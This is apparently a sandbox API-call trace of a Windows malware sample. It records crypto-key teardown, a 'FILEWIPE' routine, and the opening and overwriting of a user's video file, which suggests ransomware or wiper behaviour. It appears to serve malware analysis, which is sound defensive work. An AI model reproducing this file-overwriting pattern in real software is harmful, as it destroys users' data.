[0198.332] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0198.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.332] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.332] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.332] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.332] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.333] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.333] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.333] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0198.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.336] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.336] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.336] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.340] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.340] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.340] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0198.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.340] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.340] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.340] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0198.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.341] CryptDestroyKey (hKey=0x90af18) returned 1 [0198.341] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.341] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.341] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.341] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.341] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.341] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.341] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0198.341] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.341] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.342] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0198.342] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.342] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.342] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.342] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.342] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.342] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0198.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.342] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.342] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.342] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.347] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.347] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.347] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.347] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.347] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.347] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.347] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.347] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.348] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.348] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.348] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0198.348] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.348] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.348] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0198.348] FreeLibrary (hLibModule=0x74f20000) returned 1 [0198.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0198.348] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.348] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.349] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.350] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.350] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0198.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0198.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.351] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.351] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.351] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210cc660, ftCreationTime.dwHighDateTime=0x1d5d964, ftLastAccessTime.dwLowDateTime=0x7df0cc0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x7df0cc0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x8c35, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Mmrkxsc9iiZ.swf", cAlternateFileName="MMRKXS~1.SWF")) returned 0x90ae18 [0198.351] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0198.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.352] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.352] CharLowerBuffW (in: lpsz="byte[35893]", cchLength=0xb | out: lpsz="byte[35893]") returned 0xb [0198.352] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.352] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0198.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.352] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0198.352] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0198.352] FreeLibrary (hLibModule=0x75c90000) returned 1 [0198.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0198.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0198.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0198.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0198.353] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.353] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.353] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.353] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0198.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.395] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0198.395] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\mmrkxsc9iiz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.396] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.396] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.396] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.396] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.396] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0198.396] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.397] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.397] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 